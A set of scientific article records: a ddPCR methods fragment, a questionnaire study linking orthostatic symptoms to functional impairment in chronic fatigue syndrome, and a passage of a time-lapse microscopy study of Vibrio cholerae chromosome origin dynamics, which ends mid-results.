Precision and determination of DNA quantity was measured from at least three replicate PCR wells and expressed as %RSD.The accuracy was determined by measuring the DNA spike recovery and expressed as %Recovery by the following calculation: ((DNA quantity in spiked sample) -(DNA quantity in unspiked sample))*100/Spike amount
Figure 1 .
Figure 1.Droplet fluorescence of E. coli ddPCR.The amount of serially diluted E. coli DNA standard alone (Std) and spiked to drugs in ddPCR is shown on the x-axis.Two purified drugs, RP-IG and RP-IR at 5.0 µg each, were used.The fluorescence amplitude (of Ch 1 set for FAM) for each droplet after PCR in this 1D concentration plot, analyzed with Bio-Rad QuantaSoft, is shown on the y-axis.The vertical dashed yellow lines separate the individual wells (noted in some cases at the top) of the ddPCR plate.The horizontal red line is the threshold separating positive (blue dots) and negative droplets (black dots) was created manually and set at 1000.
Table 1 .
Sample matrix effect on qPCR and ddPCR.
Table 2 .
Quantification of E. coli hr DNA. | 2019-04-09T13:09:43.936Z | 2018-04-26T00:00:00.000 | {
"year": 2018,
"sha1": "22b980f9125b74143d2e2b9c8a573481644e43cc",
"oa_license": "CCBY",
"oa_url": "http://www.scirp.org/journal/PaperDownload.aspx?paperID=84324",
"oa_status": "HYBRID",
"pdf_src": "MergedPDFExtraction",
"pdf_hash": "28cdef5fba7fae13bc77fd29c0ee78541e6bf3cf",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Chemistry"
]
} |
15926360 | pes2o/s2orc | v3-fos-license | Orthostatic symptoms predict functional capacity in chronic fatigue syndrome: implications for management
Summary Objectives: To establish the relationship between the functional impairment experienced by Chronic fatigue syndrome (CFS) patients and the symptoms frequently experienced by those with CFS; specific-ally cognitive impairment, fatigue and orthostatic symptoms. Design: Cross sectional questionnaire survey. Setting: Specialist CFS Clinical Service. Subjects: Ninety-nine Fukuda diagnosed CFS and 64-matched controls. Main outcome measures: Symptom and functional assessment tools completed and returned by post included; PROMIS HAQ (Patient-Reported Outcomes Measurement Information System, Health Assessment Questionnaire), CFQ (Cognitive Failures Questionnaire), FIS (Fatigue Impact Scale) and OGS (Orthostatic Grading Scale) assessment tools. Results: CFS patients experience greater functional impairment than controls [mean (95% CI) PROMIS HAQ scores CFS 36 (31–42) vs. controls 6 (2–10); P < 0.0001], especially in the functional domains of activities and reach. Poorer functional ability impairment is significantly associated with greater cognitive impairment ( P = 0.0002, r = 0.4), fatigue ( P < 0.0001, r = 0.5) and orthostatic symptoms ( P < 0.0001, r = 0.6). However, only orthostatic symptoms (OGS) independently associated with functional impairment ( (cid:2) = 0.4, P = 0.01). Conclusions: Treatment of orthostatic symptoms in CFS has the potential to improve functional capacity and so improve quality of life.
Introduction
Chronic fatigue syndrome (CFS) is a common debilitating condition thought to affect 0.2-2% of the UK population. [1][2][3][4][5] CFS is associated with a constellation of symptoms that lead to considerable disability. The level of impaired functional ability in CFS is not homogenous with studies showing it to be comparable with a number of other chronic diseases, most notably multiple sclerosis, hypertension, congestive heart failure, acute myocardial infarction, depression, end-stage renal disease, heart disease and untreated hyperthyroidism. [6][7][8][9][10] A number of studies have suggested that functional impairment in CFS is related to cognitive deficits. [11][12][13][14][15] Recent studies have confirmed that in addition to the classically recognized symptoms of fatigue and cognitive impairment almost 90% of those with CFS experience symptoms related to orthostasis. 16,17 The relationship between functional capacity and the other symptoms described by those with CFS is currently unclear. Understanding this will allow treatment to be directed to those symptoms whose improvement has the potential to lead to the greatest functional gain. Here, we measured using a patient reported outcome tool, the degree of functional impairment experienced by those with CFS and the impact of the symptoms of CFS (cognitive impairment, fatigue and autonomic dysfunction) upon this functional impairment. The purpose of this study was to discover how these symptoms relate to functional capacity in CFS with the aim of improving understanding and appreciation of how, and in what particular functional domains, CFS affects patients' lives.
Subjects
Subjects were 135 consecutive patients referred to the Newcastle upon Tyne Royal Victoria Hospital over the 6 months from January to June 2009 who fulfilled the Fukuda diagnostic criteria for CFS. 4 The control group was recruited by asking each CFS patient to invite one non-CFS friend (of comparable age and sex) to complete the symptom assessment tools. No selection (positive or negative) was made with regard to co-morbidity, fatigue status or functional ability.
Measures
Four functional and symptom assessment tools were sent by post to a total of 135 CFS patients. Subjects were asked to complete these measures and return them in a prepaid envelope. The assessment tools included were: (1) PROMIS HAQ-Patient-Reported Outcomes Measurement Information System, Health Assessment Questionnaire. 18,19 This tool assesses the functional impact of CFS on subjects, by measuring the functional and physical ability of the subjects. The PROMIS HAQ was derived from the HAQ and consists of 20 questions that ask patients to rate their ability to carry out daily activities on a 5-point scale of '0 = without any difficulty' to '4-unable to do'. The 20 questions are divided into eight domains of physical function: dressing, arising, eating, walking, hygiene, reach, grip and activity. The highest scoring question in each domain is used as the domain score. All eight-domain scores are added together, divided by eight and multiplied by 25 to calculate the total PROMIS HAQ score. Higher scores indicate worse functional ability and therefore greater functional impairment.
(2) CFQ-Cognitive Failures Questionnaire. [20][21][22] In order to determine whether CFS patients experienced cognitive symptoms more frequently than matched controls, indicating worse cognitive impairment, the CFS patients and controls completed the CFQ, which assessed their level of cognitive ability. The presence and severity of cognitive symptoms were compared between the two groups. This tool assesses the prevalence of cognitive symptoms, by measuring the frequency of cognitive slips or failures occurring in everyday life. The cognitive abilities assessed in the CFQ include memory, attention, concentration, forgetfulness, word-finding abilities and confusion. The questionnaire consists of 25 items covering failures in perception, memory and motor function and asks patients to rate how often these failures occur, on a 5-point Likert scale of 0-4 (0 = never, 4 = very often). The responses for the 25 questions are added together to obtain the total CFQ score. The higher the score, the greater the cognitive impairment.
(3) FIS-Fatigue Impact Scale. 23 The FIS measures fatigue experienced by CFS patients, and how the fatigue functionally limits them in their lives and activities. The FIS assesses patients' perception of how fatigue affects their cognitive, physical and psychosocial functions. This includes the impact of fatigue on their work, family and financial responsibilities, their mood, their reliance on others, their social activities, and on their quality of life. It is made up of 40 items and subjects must rate how badly affected these items are due to fatigue on a 5-point scale ranging from 0 (no problem) to 4 (extreme problem). The total FIS score is calculated by adding all answers from the 40 questions together. Higher scores indicate greater impact of fatigue.
(4) OGS-Orthostatic Grading Scale. 24 The OGS is a self-report assessment tool consisting of five items, which assess the frequency of orthostatic symptoms, severity of orthostatic symptoms, conditions under which orthostatic symptoms occur, activities of daily living and standing time.
Patients are asked to grade each item on a scale of 0-4, 0 being the lowest and 4 the highest. The total OGS score is calculated from adding up the scores from each item. Higher scores indicate greater severity of autonomic dysfunction.
Data analysis
Analysis was performed using the statistical analysis software Prism 3.0 and SPSS. It was determined whether data was normally or non-normally distributed. Where data was normally distributed it is presented as mean AE standard deviation, and comparisons were made between groups using un-paired t-tests. Where data was non-normally distributed the data is presented as median and range and comparisons were made by Mann-Whitney U-test. To determine whether the degree of functional impairment experienced by CFS sufferers was influenced by the symptoms they experienced, we explored the univariate relationship between functional capacity and the symptom assessment tools of cognitive symptoms, fatigue and autonomic dysfunction. Univariate analysis was performed by correlations using Spearman and Pearsons tests where appropriate for parametric and non-parametric data.
To determine whether the relationships between functional ability and the symptoms of CFS (cognitive impairment, fatigue and autonomic dysfunction) are independent of each other, a multivariate analysis was performed using the log-rank test. Differences in proportions were determined using Chi-squared tests. A statistically significant result was considered when P < 0.05.
Ethical permission
The programme of research is approved by the Newcastle and North Tyneside LREC. The project was funded by ME Research UK. Consent for data use was implied by return of the assessment tools.
Results
Ninety-nine CFS patients who were sent the assessment tools participated in this study (response rate of 99/135;73%). Mean AE standard deviation age of the patients was 57.3 AE 15, and 87% were female (86 female, 13 male). The CFS patients were matched group wise (by mean age and proportion of females) to 64 control subjects whose mean age was 59.3 AE 17, and 83% were female (53 female, 11 male).
Overall functional impairment
Functional capacity was significantly reduced in the CFS group compared to controls when assessed using the total PROMIS HAQ score (Figure 1; P < 0.0001) with the mean AE standard deviation for the CFS patients (36.4 AE 27) almost seven times greater than that of the controls (5.9 AE 15) [median (25 percentile) CFS 34.4 (12.5-56.3) vs. controls 0 (0-2.5)]. On examining the proportion of the total groups who experienced no functional impairment, only nine out of the total 99 CFS subjects (9%) scored 0 on the PROMIS HAQ, marking themselves as being able to do a task 'without any difficulty', whereas 37 out of the 64 control subjects scored 0 (57.8%) (P < 0.0001).
Examining the domains of functional ability
The PROMIS HAQ assessment tool comprises eight separate domains of physical function: dressing, arising, eating, walking, hygiene, reach, grip and activities. Table 1 shows the individual PROMIS HAQ domain scores (scored out of four) for CFS patients compared to matched controls.
In all domains of functional ability those with CFS recorded significantly higher scores compared to controls, signifying CFS patients have worse physical ability/functioning than controls across the whole spectrum of functional activities.
Relationship between functional capacity and symptoms in CFS
As expected the CFS group experienced higher levels of fatigue and orthostatic symptoms compared to controls. The total score on the cognitive failures questionnaire was higher for the CFS group than the control group, demonstrating that as with other cognitive assessment tools CFS patients have greater cognitive impairment than the controls (Figure 2). On univariate analysis, there were strong significant correlations between cognitive symptoms, fatigue and autonomic symptoms ( Table 2) with increased symptoms being associated with worse functional capacity.
Independent associations between functional capacity and symptoms in CFS
The results of the multivariate analysis are shown in Table 3. The results confirm that worsening autonomic symptoms are independently associated with increased functional impairment, whereas worsening cognitive impairment or fatigue is not.
A similar multivariate analysis was performed for each of the individual PROMIS HAQ domains with the CFQ, FIS and OGS scores. This analysis found that higher autonomic symptom burden was independently associated with functional impairment in the walking (P = 0.017; = 0.37), arising (P = 0.034; = 0.34), activities (P = 0.041; = 0.285) and eating (P = 0.029; = 0.355) domains, and that increased fatigue independently associated with higher scores also in the walking (P = 0.032; = 0.402) and activities (P = 0.001; = 0.620) domains, and in the hygiene domain (P = 0.016; = 0.229). There were no independent predictors of impairment in the dressing, reach and grip domains; and no domains were found to be independently associated with CFQ scores.
Discussion
This study confirms that functional capacity is reduced in patients with CFS compared to that of normal subjects. The ability of the patients to carry out everyday activities was found to be lower than that of control subjects in all of the eight domains of functional ability measured by the PROMIS HAQ assessment tool. Significant associations between the functional impairment of CFS patients and symptoms of cognitive deficits, fatigue and autonomic symptoms were identified; confirming that greater functional impairment associates with greater cognitive impairment, fatigue and worse orthostatic symptoms. However, only higher burden of orthostatic symptoms independently associated with functional impairment when multivariate analysis of the data was performed. This study confirms that orthostatic symptoms and the underlying autonomic dysfunction that is found frequently in those with CFS 16,17,[25][26][27][28] is the key symptom to impact on functional ability. Therefore, the focus of treatment of CFS should be the orthostatic symptoms rather than the symptom of fatigue. If orthostatic symptoms were treated and the autonomic dysfunction was improved, it would potentially decrease functional impairment in this patient group and hence improve/increase their functional capacity.
Since functional impairment also has a positive correlation with both cognitive impairment and fatigue, it implies that if the functional impairment was reduced by treating the autonomic dysfunction, the severity of cognitive difficulties and fatigue might also decrease. Studies in fatigue and non-fatigue associated diseases suggest a link between autonomic dysfunction and cognitive impairment, with poorer scores on cognitive function tests in those patients with postural dysregulation of blood pressure 29-34 the physiological abnormality increasingly recognized in CFS. 35,36 Functional impairment in all domains was significantly associated with orthostatic symptoms, with the most significant and strongest relationship being in the domain of walking. Furthermore, the multivariate analysis showed functional impairment in the domains of walking, arising, eating and activities to be independently associated with orthostatic symptoms. Walking, arising and activities all involve standing up or being stood upright. The autonomic nervous system plays an important role when standing upright in overcoming the gravitational effect of blood pooling in the lower limbs, causing an imbalance in arterial and venous blood pressures. If not addressed, this would lead to insufficient perfusion and malfunction of organs and tissues. The autonomic nervous system overcomes this by increasing sympathetic activity to induce vasoconstriction of large veins in the legs in order to re-equilibrate arterial and venous blood pressures by promoting increased venous return. With autonomic dysfunction these compensatory mechanisms may be impaired and as a result standing up and related activities would be adversely affected leading to functional impairment. Our recent study confirming impaired muscle bio-energetic function in CFS the degree of which associates with autonomic dysfunction 37 could also explain why if muscles are functioning sub-optimally this leads to inability to perform activities of daily living. It could, therefore, be predicted that if autonomic dysfunction was treated in CFS patients, the domains involving standing or an upright posture may show the greatest improvement in functional ability. Despite this, the UK CFS/ME NICE guidelines 5 which recommend the investigation and management strategy for those with CFS does not include objective or subjective evaluation of autonomic function in this important patient group.
One treatment of autonomic dysfunction in CFS that has recently been investigated in a clinical trial of 38 CFS patients is home orthostatic training (HOT). 38 This intervention in a small feasibility study was found to improve autonomic function (decrease in blood pressure whilst standing, increase in total peripheral resistance) and improve patients' reports of fatigue over a 6-month period measured by the FIS, showing an encouraging trend towards eliminating fatigue by improving orthostatic symptoms. HOT is considered to be an effective and established treatment in other diseases associated with autonomic dysfunction. [39][40][41] This study has some limitations. Since the nature of the assessment involved self-report questionnaires, the responses are all subjective. One patient's opinion of the assessment scale may be different to another patient, and hence the responses may not be completely consistent in their description of severity of symptoms. However, the magnitude of the differences between the patients and the controls would suggest that even if the patients over reported by 50% the differences would still be dramatically different. Furthermore, it is possible that the results were influenced by the design of the study; non-responders may be too symptomatic to respond to the questionnaires or conversely be too active to respond.
In summary, this study has confirmed that functional capacity is reduced in CFS patients compared to that of control subjects, and that functional impairment in CFS is significantly related to the symptom of autonomic dysfunction, therefore treating autonomic dysfunction would be expected to improve patients' functional capacity particularly in the upright position, and hence improve quality of life. Future research should focus on treatments of autonomic dysfunction in CFS, both pharmacological and physiological in nature in order to determine whether improvements in autonomic function are paralleled by increased functional capacity.
Funding
United Kingdom NIHR Biomedical Research Centre in Ageing -Cardiovascular Theme; ME Research | 2017-04-21T01:46:43.342Z | 2010-08-01T00:00:00.000 | {
"year": 2010,
"sha1": "bb8a78491fea68f078ddfaea36bd78da7d50b36c",
"oa_license": "CCBY",
"oa_url": "https://academic.oup.com/qjmed/article-pdf/103/8/589/4371352/hcq094.pdf",
"oa_status": "HYBRID",
"pdf_src": "Adhoc",
"pdf_hash": "de693c96b030f6d3e97d2e0c0940e18482cbec8b",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
14793213 | pes2o/s2orc | v3-fos-license | Fine-scale time-lapse analysis of the biphasic, dynamic behaviour of the two Vibrio cholerae chromosomes
Using fluorescent repressor-operator systems in live cells, we investigated the dynamic behaviour of chromosomal origins in Vibrio cholerae, whose genome is divided between two chromosomes. We have developed a method of analysing fine-scale motion in the curved co-ordinate system of vibrioid bacteria. Using this method, we characterized two different modes of chromosome behaviour corresponding to periods between segregation events and periods of segregation. Between segregation events, the origin positions are not fixed but rather maintained within ellipsoidal caged domains, similar to eukaryotic interphase chromosome territories. These domains are approximately 0.4 µm wide and 0.6 µm long, reflecting greater restriction in the short axis of the cell. During segregation, movement is directionally biased, speed is comparable between origins, and cell growth can account for nearly 20% of the motion observed. Furthermore, the home domain of each origin is positioned by a different mechanism. Specifically, the oriCI domain is maintained at a constant actual distance from the pole regardless of cell length, while the oriCII domain is maintained at a constant relative position. Thus the actual position of oriCII varies with cell length. While the gross behaviours of the two origins are distinct, their fine-scale dynamics are remarkably similar, indicating that both experience similar microenvironments.
Introduction
For over 100 years, the dynamic behaviour of eukaryotic chromosomes within the nuclei of living cells and the dramatic events involved in chromosome segregation have been directly observed in the light microscope (Wilson, 1896). The organization and dynamics of bacterial chromosomes are more difficult to observe, and information on their behaviour has only recently emerged. Experiments in live cells have revealed that bacterial chromosomes also undergo a period of rapid segregation that may be analogous to eukaryotic anaphase (Glaser et al ., 1997;Webb et al ., 1998;Gordon et al ., 2004;Viollier et al ., 2004). Furthermore, at least in the case of Caulobacter crescentus and in slow-growing Escherichia coli , the bacterial chromosome is highly organized; chromosomal loci are ordered in a linear array throughout the cell that corresponds to their position on the chromosome Viollier et al ., 2004). In addition, multiple techniques have revealed that the bacterial chromosome is organized into a number of functional domains (for example Niki et al ., 2000;Postow et al ., 2004;Valens et al ., 2004;Lesterlin et al ., 2005;Stein et al ., 2005). These findings have sparked widespread interest in bacterial chromosome dynamics, particularly during segregation. Less attention has been focused on chromosome dynamics between periods of segregation.
The positions of chromosomal loci in bacterial cells are highly stereotyped among individuals in a population and are correlated to their position in the genome. Specifically, the origin and termini regions typically reside at opposite ends of the nucleoid Webb et al ., 1997;Niki and Hiraga, 1998;Lemon and Grossman, 2000;Li et al ., 2002;Lau et al ., 2003) and intervening loci occupy positions between the origin and terminus that correspond to their relative position on the chromosome Niki et al ., 2000;Viollier et al ., 2004). Similarly, segregation of the chromosome begins at the replication origin of the chromosome and proceeds sequentially through the chromosome to the terminus (Viollier et al ., 2004;Bates and Kleckner, 2005;Fekete and Chattoraj, 2005;Wang et al ., 2005).
Nevertheless, while there is order in the overall gross localization and segregation of bacterial chromosomes, individual origins exhibit positional variation , and origins of fast-growing E. coli chromosomes are dynamic with apparently random motion (Elmore et al ., 2005). The extent of mobility of individual positions on the chromosome is not well understood. In all population-based studies, where the location of a single chromosomal locus is determined in many individual bacteria, chromosomal loci have been found to occupy a broad range of positions. It is not clear to what extent the positional distributions reflect variations among individual bacteria or variations within individual bacteria that occur through time as a result of chromosomal movement. Importantly, the mobility of a chromosomal locus is under different constraints than a protein or other small molecule. A particular segment of DNA is covalently linked to a molecule many times longer than the cell itself and thus is compacted within the cell. Moreover, the DNA interacts with other cellular components via transcription, coupled translation and transertion. The active mechanisms operating during chromosome segregation in bacteria must separate the duplicated chromosomes in the context of these underlying constraints. We were therefore particularly interested in measuring the fine-scale mobility of bacterial chromosomal loci during the phases of the cell cycle between segregation events, and determining how the underlying mobility changes during active segregation.
We examined chromosome dynamics in Vibrio cholerae because it affords the opportunity to examine the behaviour of two distinct chromosomes in the same bacterial cell. Previous studies have indicated that both V. cholerae origins synchronously initiate replication once per cell cycle when grown in minimal media (Egan et al ., 2004). Under these conditions, only one or two origins are expected for each chromosome per cell. In addition, the origins of both chromosomes have different steady-state localization patterns (Fogel and Waldor, 2005). Specifically, the origin of chromosome I occupies a near polar position and segregates asymmetrically from that position, while the origin of chromosome II localizes to the middle of the cell and segregates symmetrically. Moreover, chromosome segregation is not synchronous as it is in eukaryotic systems: the origin of chromosome I segregates early in the cell cycle and the origin of chromosome II segregates late in the cell cycle (Fogel and Waldor, 2005). Thus on a gross scale, the origins of the two V. cholerae chromosomes exhibit distinct behaviours. At the outset of this work, the fine-scale dynamic behaviour of the V. cholerae origins was not known. Here we quantitatively describe the dynamic behaviour of the origin region of both V. cholerae chromosomes during segregation and also between segregation events.
Results
To monitor the behaviour of the V. cholerae chromosome origins in live cells, either lacO or tetO arrays were inserted near the origin of both chromosomes and visualized with LacI-CFP or TetR-YFP respectively (Lau et al ., 2003). Simultaneous visualization of both origins reveals qualitatively distinct localization patterns for each origin (Fig. 1). These steady-state distribution patterns are the same in reciprocally marked strains ( Figure S1) and confirm those described by Fogel and Waldor (2005) who characterized the positions of lacO and tetO arrays inserted at different origin-proximal sites. Together, these data indicate that neither the identity of the arrays nor the exact position of insertion affects the observed origin localization patterns.
For quantitative analyses of movement of subcellular features, it is important to consider the frame of reference for the measurements. Cell-based measurements are defined relative to a reference position in the cell such as a pole or the mid-cell. The non-uniform curvature of V. cholerae cells makes it difficult to directly translate fluorescent tag locations into cell-based co-ordinates. Young V. cholerae cells are curved to varying degrees and longer cells about to divide are often S-shaped. For quantitative position measurements throughout this study, we established an objective and general cell-based co-ordinate system corresponding to the length and width of the cell. The length of non-uniformly curved rods is measured as a sum of short linear segments along the centre of the cylindrical axis (Fig. 2). The two axes of the cell-based coordinate system correspond to positions along the centreline of the cell (length axis) and perpendicular distance from the centreline (width axis) (Fig. 2). In this way, we were able to measure origin locations using the length and width axes of the curved Vibrio cells across a population with varying shapes. We examined origin positions using both actual distances between the centre of the origin foci and a reference position in the cell such as a pole or the mid-cell, and fractional distances normalized by cell length. As shown in Fig. 2B, this analysis facilitated comparison of origin positions in large populations of cells as well as in individual cells over time (see below).
Gross behaviour of V. cholerae origins
For exploration of dynamic behaviour, we used time-lapse microscopy to track fluorescent foci corresponding to TetR-YFP bound to tetO arrays inserted near the origin regions of both V. cholerae chromosomes ( ∼ 13 kb counterclockwise from oriC I and ∼ 12 kb counterclockwise from oriC II ) as they moved over 5 min, 20 s and 1 or 2 s intervals. Tracks from the 5 min interval movies provide a general picture of the behaviour of each origin, examples of which are shown in Fig. 3A-D. To facilitate comparisons between cells, origin tracks from all cells were plotted as a function of cell length ( Fig. 3E and F). These tracks from 5 min interval movies corroborate the large-scale behaviours previously described (Fogel and Waldor, 2005). First, each origin occupies a distinct region of the cell, with oriC I near the poles and oriC II near the mid-cell. Second, each origin exhibits a distinct segregation pattern; oriC I segregates asymmetrically with one copy maintaining the original position, while oriC II segregates symmetrically from the mid-cell. Third, separation of the tracks in Fig. 3E and F into individual points representing segregating and non-segregating points in the cell cycle ( Fig. 3G and H) corroborates the sequential segregation of the two origins described by Fogel and Waldor (2005), with oriC I segregating fairly early in the cell cycle when bacteria are ∼ 3 µ m in length and oriC II segregating later when bacteria are typically ∼ 4 µ m or longer. These observations set the groundwork for further quantitative analyses.
Tracking oriC I through cell divisions reveals that this origin remains near the old pole, as opposed to the new pole formed by the most recent cell division. Furthermore, once the oriC I home position is established, it is maintained through subsequent cell divisions ( Fig. 3A and C). Positioning of oriC II followed a different pattern. Because the home for oriC II is near the mid-cell, this position changes with each cell division ( Fig. 3B and D). Tracking oriC II through cell divisions reveals that the home position of oriC II is biased towards the new pole. Of 18 origins observed through a cell division, 14 were closer to the pole recently formed by cell division.
In the initiation of segregation, we observed several cases where a second origin focus appears, then seems to disappear for one or more frames, and then reappears and persistently moves across the cell (for example see arrow in Fig. 3C). This was observed in three of 18 oriC I segregations and three of 23 oriC II segregations. This behaviour was not observed at other times in the cell cycle. While it is possible that this observation reflects some dynamic behaviour of the integrated arrays, we interpreted this to indicate a pre-segregation period where the origin has been replicated but the two copies have not yet committed to segregation. These origins bounce randomly, separating transiently and coming back together, before finally committing to segregate to opposite poles. This bouncing behaviour suggests that the process of segregation is separated in time from the process of replication of the chromosome. Furthermore, this observation The length of the cell is the sum of short linear segments (delimited by the green dots) along the centre of the bacterium. Red dots indicate the poles. The position of each focus was measured in terms of distance from the centreline (red bracket) and distance from the pole (black bracket). B. Expected line fitting analysis if origins were localized to fixed distances from the pole (i and ii) or fixed relative positions in the cell (iii and iv); see text for further details. In these examples, origins are a maintained at a distance of 0.5 µ m from the pole (i and ii) or a relative position of 30% of the cell length (iii and iv). suggests that V. cholerae chromosomes remain cohered for some time after replication before segregation occurs. Several lines of evidence indicate a period of cohesion of E. coli chromosomal loci after replication (Sunako et al ., 2001;Bates and Kleckner, 2005).
Origin behaviour is biphasic and correlated with progress through the cell cycle
Following origin motions over time in individual cells, we observed and characterized two distinct modes of behaviour of V. cholerae origins corresponding to periods of active segregation and periods between segregation events. Segregation begins when one focus separates into two distinct foci and includes directional origin movement across the cell. The examples of origin behaviour in individual cells in Fig. 3A-D demonstrate that between segregation events, the position of the origin is not fixed but is confined to a region, within which it exhibits rapid but apparently random motion (analysed in more detail below, Figs 5 and 6). The region of origin confinement is near the pole for oriC I and near the mid-cell for oriC II (Fig. 3A-H). We term this confined region the 'home' position. Comparison of the dynamic behaviour patterns from all cells ( Fig. 3E and F) revealed that in every track, the position of the chromosome origin is variable in the home position, suggesting that the variation in the actual position of the chromosome origins within a cell population is largely due to variation over time within individual cells, rather than strictly to cell-to-cell variation. These two phases of chromosomal behaviour have been observed in E. coli, Bacillus subtilis and C. crescentus Webb et al., 1998;Viollier et al., 2004) with an emphasis on the segregating phase. We went on to quantitatively characterize movement in both phases to understand the dynamics of chromosomes throughout the cell cycle.
The home position of each origin is differentially maintained
Given that chromosomal origins are not randomly distributed throughout the cell, and that oriC I and oriC II have unique distribution patterns, we asked how the origin's home position is determined. We examined two possible scenarios. The first possibility is that the origins are consistently positioned at a particular actual distance from a pole. In this case, origin distances from the pole will be conserved regardless of the length of the cell. The slope of a linear fit of the home position versus cell length will be zero, and the intercept will indicate the distance from the pole (Fig. 2B, i). Fractional positions will be inversely proportional to cell length, and as a result, will fit a power function (y = ax b ) where the exponent b = −1, and the scal- ing factor, a, indicates the fractional distance from the pole (Fig. 2B, ii). The second possible scenario is that the origin is localized to a relative position in the cell. The MinCDE system used by E. coli to identify the middle of the cell, regardless of length exemplifies this scenario (reviewed by Margolin, 2001). If the origins localize to a relative position in the cell, the slope from a linear fit of origin home positions versus cell length will reveal the relative position measured by the cell and the intercept should be near zero (Fig. 2B, iii). Conversely, a regression line from fractional positions versus cell length will have a slope of zero, and the intercept will indicate the relative position measured by the cell (Fig. 2B, iv). We found that different methods are used to maintain the home positions of oriC I and oriC II .
All analyses indicate that oriC I is positioned by a mechanism that measures actual distances (Fig. 4). oriC I home positions are maintained through cell division and as a result of asymmetric segregation do not depend on the number of segregated origins in the cell. Therefore, oriC I positioning was evaluated without regard to the number of origin foci in the cell. First, linear regression of positions of individual oriC I tracks in the home phase yields a median slope near zero (0.07) (Fig. 4A, Table 1). Furthermore, linear regression of all home oriC I together also gives a slope near zero (0.03) and an intercept of 0.58 µm (Fig. 4B). Fractional positions fit a power function with an exponent that approaches −1 (−0.96) and a scaling factor of 0.58 (Fig. 4C). Together these data indicate that oriC I is positioned at a constant actual distance (average ∼0.6 µm) from the pole independent of cell length or cell cycle phase.
In contrast, similar analyses of oriC II in its home position indicate that it is localized by a mechanism that measures relative position in the cell (Fig. 4). Because the distributions for cells with one or two discrete oriC II foci are different, they were separated for this analysis. Analysis of the actual positions of individual tracks for single oriC II foci versus cell length resulted in a median slope of 0.48 ( Fig. 4A, Table 1). Linear regression of the actual posi- Fig. 4. Between segregation events, oriC I is positioned at a constant absolute distance from the pole and oriC II is positioned at a constant relative distance from the pole. For analysis of home positioning method, origin tracks from 5 min interval movies were analysed. All oriC I tracks as well as duplicated and segregated oriC II tracks are plotted with the nearest pole at zero. This enables comparison of 'home' domains on opposite sides of the cell. Before an observed cell division, the poles are indistinguishable. For measurement of oriC II position, using the nearest pole as zero gives a non-normal distribution of positions (not shown) indicating a bias in measurement. Thus, before observed divisions, single oriC II tracks are plotted with an arbitrary pole at zero; after cell division, the new pole was used as the zero. A. Regression lines for individual origins in the home position (black lines) correspond to the home position tracks as shone in Fig. 3E and F (thin blue or pink lines). The average slope for oriC I is 0.07. The average slope for oriC II is 0.48 when single copy and 0.15 when duplicated. B. Regression analysis of the actual positions of the time-lapse foci taken together as a whole. oriC I fits a line with a slope near zero (y = 0.03x + 0.58) and oriC II fits a line with a slope near 0.5 (y = 0.49x − 0.02) when single copy and near 0.25 (y = 0.29x + 0.21) when segregated. C. The fractional positions of the time-lapse origin versus cell length. oriC I fits a line with the equation y = 0.58x (−0.96) and oriC II fits a line with a slope of zero (y = 0.001x + 0.48) and (y = −0.01x + 0.39) for single and double spots respectively. D. Regression analysis for a population of still images of ∼500 cells yields lines of (y = 0.09x + 0.35) for oriC I and (y = 0.50x + 0.006) and (y = 0.33x − 0.03) for single and double copies of oriC II respectively. These fits are comparable to those in (B) for the origins followed by time-lapse microscopy and confirm that oriC I is positioned at an actual distance from the pole regardless of the number of origins in the cell and oriC II is positioned at a relative position in the cell. Solid lines indicate the fit of the data. Dotted lines represent the 5 and 95% confidence intervals of the fit calculated by Microcal Origin 6.0 (Microcal Software, Northampton, MA). A single origin in a cell is indicated by an open circle. Once segregated, origins are indicated by filled circles. tions of all single oriC II foci tracks together yielded a slope of 0.49 and a near zero intercept of −0.02 µm (Fig. 4B). Conversely, linear regression of fractional positions resulted in near zero slopes of 0.001 and −0.011 and intercepts of 0.48 and 0.39 for cells with single and double oriC II foci respectively (Fig. 4C). These analyses all support a relative positioning mechanism where oriC II tracks the mid-cell when present as a single focus and approaches the nascent mid-cells of the future daughter cells when segregated.
To confirm that this result was a general property of the population rather than that of the relatively small number of cells followed by videomicroscopy (n oriCI = 13, n oriCII = 16), regression analysis was repeated with spot positions from static images of ∼500 cells for each chromosome (Fig. 4D). In static images it is impossible to determine if the origins are at home or segregating. Therefore, all oriC I positions were compared with the nearest pole, and oriC II positions were parsed by the number of spots in the cell. Single oriC II foci were measured from an arbitrary pole while segregated oriC II foci were compared with the nearest pole. Regression analysis with population data further supports the model that oriC I is positioned at a constant actual distance from the pole while oriC II is positioned at a constant relative distance from the pole (Fig. 4D).
Origin motion is not equal along the two axes of the cell
To characterize the dynamic motion of origins throughout the cell cycle, we first analysed the changes in origin position in single 20 s or 5 min time-lapse intervals. In sequences of 20 s intervals, no initial segregation events were observed making it impossible to distinguish home and segregating phases. Therefore, all time intervals were considered together. The 5 min intervals were separated by phase.
For both origins, the motion was random in 20 s intervals and 5 min home phase intervals. The distributions of positional change fit Gaussian functions centred on zero ( Fig. 5A-C, Table 2) demonstrating that steps are equally likely in either direction.
In addition, steps are larger in the length axis than in the width axis. For both chromosomes, the standard devi- A. The distribution of 20 s step in the length (black squares) and width (red circles) axes fit Gaussian functions (black and red lines) centred around zero, as expected for random motion. The graphs represent 222 and 526 steps for oriC I and oriC II respectively. B and C. The steps over 5 min intervals were analysed separately for the two different phases of motion and the two axes of the cell. In the home phase, steps fit Gaussian distributions centred around zero (black and red indicate length and width axes respectively). In the segregating phase (green), the centre of the step size distribution is shifted from zero in the length (B), but not width (C), axis indicating directional bias in the length axis. oriC I distributions represent 284 and 88 steps in the home and segregating phases respectively. oriC II distributions represent 369 and 59 steps in the home and segregating phases respectively. In both (A) and (B and C) the standard deviation is greater in the length axis than in the width axis, indicating larger steps in the long axis of the cell (see text). Table 2), indicating that origins are more likely to move farther in the length axis than in the width axis in a given interval. For steps in 20 s intervals, the differences in standard deviation are small but statistically significant (F-test P = 0.003 and P << 0.0001 for oriC I and oriC II respectively). Bias towards larger steps in the long axis of the cell is more apparent at 5 min intervals indicating a continuous effect. Again, the standard deviation is greater in the length axis for both origins (F-test P << 0.0001 for both origins). Thus motion in 20 s intervals and in 5 min home phase intervals is random in direction, but biased in magnitude with longer steps in the length axis. This bias in movement indicates that motion is differentially confined in the two axes of the cell. Furthermore, oriC I and oriC II behaved similarly between 20 s and 5 min intervals in both the length and width axes (Fig. 5), demonstrating that both origins experience similar constraints.
Motion in the segregating phase is directed
